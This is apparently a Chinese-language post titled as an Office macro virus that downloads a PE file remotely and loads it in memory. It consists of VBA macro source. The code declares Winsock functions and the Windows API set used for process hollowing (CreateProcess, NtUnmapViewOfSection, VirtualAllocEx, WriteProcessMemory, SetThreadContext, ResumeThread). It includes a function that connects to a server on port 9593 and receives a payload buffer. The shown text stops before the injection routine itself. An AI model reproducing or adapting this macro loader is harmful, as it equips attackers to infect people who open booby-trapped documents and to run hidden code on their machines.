一个远程下载并内存加载PE的office宏病毒

#If Win64 Then    Public Declare PtrSafe Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long    Public Declare PtrSafe Function connect Lib "ws2_32.dll" (ByVal socket As LongLong, ByVal SOCKADDR As LongLong, ByVal namelen As Long) As Long    Public Declare PtrSafe Sub WSACleanup Lib "ws2_32.dll" ()    Private Declare PtrSafe Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As LongLong, lpResult As LongLong) As Long    Public Declare PtrSafe Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long    Public Declare PtrSafe Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long    Private Declare PtrSafe Sub CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long)    Public Declare PtrSafe Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long    Public Declare PtrSafe Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long    Public Declare PtrSafe Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long    Private Declare PtrSafe Function WSAGetLastError Lib "ws2_32.dll" () As Long     Private Declare PtrSafe Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As LongPtr, ByVal sSource As LongPtr, ByVal lLength As Long)    Private Declare PtrSafe Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As LongPtr, ByVal lpFilename As String, ByVal nSize As Long) As Long    Private Declare PtrSafe Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As LongPtr, ByVal lpThreadAttributes As LongPtr, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As LongPtr, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long    Private Declare PtrSafe Function GetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long    Private Declare PtrSafe Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long    Private Declare PtrSafe Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpAddress As LongPtr, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As LongPtr    Private Declare PtrSafe Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As LongPtr, ByVal lpBaseAddress As LongPtr, ByVal lpBuffer As LongPtr, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long    Private Declare PtrSafe Function SetThreadContext Lib "kernel32" (ByVal hThread As LongPtr, lpContext As CONTEXT) As Long    Private Declare PtrSafe Function ResumeThread Lib "kernel32" (ByVal hThread As LongPtr) As Long    Private Declare PtrSafe Function TerminateProcess Lib "kernel32" (ByVal hProcess As LongPtr, ByVal uExitCode As Integer) As Long     Public Declare PtrSafe Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As LongPtr, ByVal imageAddress As LongPtr) As Long    Private Declare PtrSafe Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)#Else    Public Declare Function WSAStartup Lib "ws2_32.dll" (ByVal wVersionRequested As Integer, ByRef data As WSADATA) As Long    Public Declare Function connect Lib "ws2_32.dll" (ByVal socket As Long, ByVal SOCKADDR As Long, ByVal namelen As Long) As Long    Public Declare Sub WSACleanup Lib "ws2_32.dll" ()    Private Declare Function GetAddrInfo Lib "ws2_32.dll" Alias "getaddrinfo" (ByVal NodeName As String, ByVal ServName As String, ByVal lpHints As Long, lpResult As Long) As Long    Public Declare Function ws_socket Lib "ws2_32.dll" Alias "socket" (ByVal AF As Long, ByVal stype As Long, ByVal Protocol As Long) As Long    Public Declare Function closesocket Lib "ws2_32.dll" (ByVal socket As Long) As Long    Private Declare Function CopyMemory Lib "kernel32" Alias "RtlMoveMemory" (Destination As Any, Source As Any, ByVal Length As Long) As Long    Public Declare Function Send Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long    Public Declare Function Recv Lib "ws2_32.dll" Alias "recv" (ByVal s As Long, ByRef buf As Any, ByVal buflen As Long, ByVal flags As Long) As Long    Public Declare Function SendWithPtr Lib "ws2_32.dll" Alias "send" (ByVal s As Long, ByVal bufPtr As Long, ByVal buflen As Long, ByVal flags As Long) As Long    Private Declare Function WSAGetLastError Lib "ws2_32.dll" () As Long    Private Declare Function VarPtrArray Lib "VBE7" Alias "VarPtr" (var() As Any) As Long    Private Declare Sub RtlMoveMemory Lib "kernel32" (ByVal lDestination As Long, ByVal sSource As Long, ByVal lLength As Long)    Private Declare Function GetModuleFileName Lib "kernel32" Alias "GetModuleFileNameA" (ByVal hModule As Long, ByVal lpFilename As String, ByVal nSize As Long) As Long    Private Declare Function CreateProcess Lib "kernel32" Alias "CreateProcessA" (ByVal lpApplicationName As String, ByVal lpCommandLine As String, ByVal lpProcessAttributes As Long, ByVal lpThreadAttributes As Long, ByVal bInheritHandles As Boolean, ByVal dwCreationFlags As Long, ByVal lpEnvironment As Long, ByVal lpCurrentDirectory As String, lpStartupInfo As STARTUPINFO, lpProcessInformation As PROCESS_INFORMATION) As Long    Private Declare Function GetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long    Private Declare Function ReadProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesRead As Long) As Long    Private Declare Function VirtualAllocEx Lib "kernel32" (ByVal hProcess As Long, ByVal lpAddress As Long, ByVal dwSize As Long, ByVal flAllocationType As Long, ByVal flProtect As Long) As Long    Private Declare Function WriteProcessMemory Lib "kernel32" (ByVal hProcess As Long, ByVal lpBaseAddress As Long, ByVal lpBuffer As Long, ByVal nSize As Long, ByVal lpNumberOfBytesWritten As Long) As Long    Private Declare Function SetThreadContext Lib "kernel32" (ByVal hThread As Long, lpContext As CONTEXT) As Long    Private Declare Function ResumeThread Lib "kernel32" (ByVal hThread As Long) As Long    Private Declare Function TerminateProcess Lib "kernel32" (ByVal hProcess As Long, ByVal uExitCode As Integer) As Long    Public Declare Function NtUnmapViewOfSection Lib "ntdll.dll" (ByVal handleProcess As Long, ByVal imageAddress As Long) As Long    Private Declare Sub Sleep Lib "kernel32" (ByVal dwMilliseconds As Long)#End If

#If Win64 Then    Private Type WSADATA        wVersion As Integer        wHighVersion As Integer        szDescription(0 To WSADESCRIPTION_LEN) As Byte        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte        iMaxSockets As Integer        iMaxUdpDg As Integer        lpVendorInfo As LongLong    End Type    Private Type ADDRINFO        ai_flags As Long        ai_family As Long        ai_socktype As Long        ai_protocol As Long        ai_addrlen As Long        ai_canonName As LongLong 'strptr        ai_addr As LongLong 'p sockaddr        ai_next As LongLong 'p addrinfo    End Type#Else    Private Type WSADATA        wVersion As Integer        wHighVersion As Integer        szDescription(0 To WSADESCRIPTION_LEN) As Byte        szSystemStatus(0 To WSADESCRIPTION_LEN) As Byte        iMaxSockets As Integer        iMaxUdpDg As Integer        lpVendorInfo As Long    End Type    Private Type ADDRINFO        ai_flags As Long        ai_family As Long        ai_socktype As Long        ai_protocol As Long        ai_addrlen As Long        ai_canonName As Long 'strptr        ai_addr As Long 'p sockaddr        ai_next As Long 'p addrinfo    End Type#End If

Enum AF    AF_UNSPEC = 0    AF_INET = 2    AF_IPX = 6    AF_APPLETALK = 16    AF_NETBIOS = 17    AF_INET6 = 23    AF_IRDA = 26    AF_BTH = 32End Enum Enum sock_type    SOCK_STREAM = 1    SOCK_DGRAM = 2    SOCK_RAW = 3    SOCK_RDM = 4    SOCK_SEQPACKET = 5End Enum

Function GetCode()    Dim m_wsaData As WSADATA    Dim m_RetVal As Integer    Dim m_Hints As ADDRINFO    Dim m_ConnSocket As Long: m_ConnSocket = INVALID_SOCKET    Dim Server As String    Dim port As String    #If Win64 Then        Dim pAddrInfo As LongLong    #Else        Dim pAddrInfo As Long    #End If    Dim RetVal As Long    Dim lastError As Long    RetVal = WSAStartup(MAKEWORD(2, 2), m_wsaData)    If (RetVal <> 0) Then        LogError "WSAStartup failed with error " & RetVal, WSAGetLastError()        Call WSACleanup        Exit Function    End If    m_Hints.ai_family = AF.AF_UNSPEC    m_Hints.ai_socktype = sock_type.SOCK_STREAM    Server = "127.0.0.1"    port = "9593"    RetVal = GetAddrInfo(Server, port, VarPtr(m_Hints), pAddrInfo)    If (RetVal <> 0) Then        LogError "Cannot resolve address " & Server & " and port " & port & ", error " & RetVal, WSAGetLastError()        Call WSACleanup        Exit Function    End If    m_Hints.ai_next = pAddrInfo    Dim connected As Boolean: connected = False    Do While m_Hints.ai_next > 0    'Do While 1        CopyMemory m_Hints, ByVal m_Hints.ai_next, LenB(m_Hints)        m_ConnSocket = ws_socket(m_Hints.ai_family, m_Hints.ai_socktype, m_Hints.ai_protocol)        If (m_ConnSocket = INVALID_SOCKET) Then            LogError "Error opening socket, error " & RetVal        Else            Dim connectionResult As Long            connectionResult = connect(m_ConnSocket, m_Hints.ai_addr, m_Hints.ai_addrlen)            If connectionResult <> SOCKET_ERROR Then                connected = True                Exit Do            End If            LogError "connect() to socket failed"            closesocket (m_ConnSocket)        End If    Loop    If Not connected Then        LogError "Fatal error: unable to connect to the server", WSAGetLastError()        Call WSACleanup        Exit Function    End If    'Dim SendBuf() As Byte    'SendBuf = StrConv("Message #1", vbNarrow)    '发送    Dim dataBuf As Variant    dataBuf = Array(32, 42, 42, 5, 6)    Dim dataLen As Integer: dataLen = UBound(dataBuf) - LBound(dataBuf) + 1    Dim sendBuf() As Byte    ReDim sendBuf(dataLen)    '打印发送的数据    Dim i As Long    For i = 0 To dataLen - 1        sendBuf(i) = dataBuf(i)        Debug.Print sendBuf(i);    Next i    RetVal = Send(m_ConnSocket, sendBuf(0), dataLen, 0)    If RetVal = SOCKET_ERROR Then        LogError "send() failed", WSAGetLastError()        Call WSACleanup        Exit Function    Else        Debug.Print "sent " & RetVal & " bytes"    End If    '接收    Dim payloadBuf() As Byte    Dim recvBuf() As Byte    Dim recvSize As Integer: recvSize = 32    ReDim recvBuf(recvSize)    Dim recvLen As Integer: recvLen = 0    Dim index As Long: index = 0    Do While 1        recvLen = Recv(m_ConnSocket, recvBuf(0), recvSize, 0)        'For i = 0 To recvLen - 1        '   Debug.Print recvBuf(i);        'Next i        'Debug.Print        If recvLen > 0 Then            ReDim Preserve payloadBuf(index + recvLen)            Call CopyMemory(ByVal VarPtr(payloadBuf(index)), ByVal VarPtr(recvBuf(0)), recvLen)            index = index + recvLen        Else            Exit Do        End If    Loop    '打印接收到的数据    Debug.Print "接收到的长度为：";    Debug.Print UBound(payloadBuf) - LBound(payloadBuf)    'Debug.Print "接收到的数据为：";    'For i = 0 To index - 1    '    Debug.Print payloadBuf(i);  '打印的时候加<;>则不换行    'Next i    'Debug.Print    RetVal = closesocket(m_ConnSocket)    If RetVal <> 0 Then    LogError "closesocket() failed", WSAGetLastError()    Call WSACleanup    Else        Debug.Print "closed socket"    End If    GetCode = payloadBufEnd Function